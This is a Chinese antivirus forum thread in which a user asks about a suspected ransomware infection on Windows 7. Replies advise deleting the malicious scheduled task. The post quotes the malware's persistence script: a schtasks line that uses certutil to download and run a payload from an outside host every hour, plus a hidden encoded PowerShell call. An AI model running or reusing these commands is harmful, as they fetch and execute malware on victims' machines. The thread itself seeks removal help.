• :
  • 好像是一种勒索病毒,金山杀毒只能阻止-爱毒霸交流论坛
    用户
     找回密码

        找回密码

    QQ登录

    只需一步,快速开始

    搜索

    [发现问题] 好像是一种勒索病毒,金山杀毒只能阻止

    [复制链接]
  • TA的每日心情
    开心
    2019-2-15 16:17
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2019-2-8 17:44:27 只看该作者

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?

    x
    系统 :win7  64位  sp1
    病毒感染后:系统启动项被改写
    内容如下:

    @echo off
    schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Certificate /tr "cmd.exe /c (cd %temp%&certutil -urlcache -split -f http://cert.beahh.com/cert.php?ver1=%COMPUTERNAME% v.dat>nul&expand -r v.dat>nul&v.bat>nul&del v.dat v.bat>nul)" /F
    powershell -nop -w hidden -ep bypass -e

    系统日志提示:
    进程:C:\Windows\system32\cmd.exe
    子进程:C:\Windows\system32\certutil.exe
    进程参数:certutil  -urlcache -split -f http://cert.beahh.com/cert.php?ver1=ABC v.dat
    操作文件 MD5:ad7b9c14083b52bc532fba5948342b98
    目标文件 MD5:7b973145f7e1b59330ca4dd1f86b3d55

    我尝试把这个硬盘取下。用另一个干净的系统在360 杀毒和 360 卫士 杀毒都不能去除,用金山卫士也不行,而且发现这个病毒是整点发作,尝试执行系统日志提示的命令。
    想问问这个病毒名称,如何去除


    我的 qq:404782091 ,欢迎探讨。
    使用道具 举报 回复
    发表于 2019-2-14 12:18:26 只看该作者
    金山卫士早不更新版本了
    使用道具 举报 回复 支持 反对
    您好,这是金山毒霸铠甲防御。整点运行,是计划任务里面有启动项,要它删掉。目前金山毒霸在计划任务这块不断发力,增强和优化计划任务的病毒检出
    使用道具 举报 回复 支持 反对
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则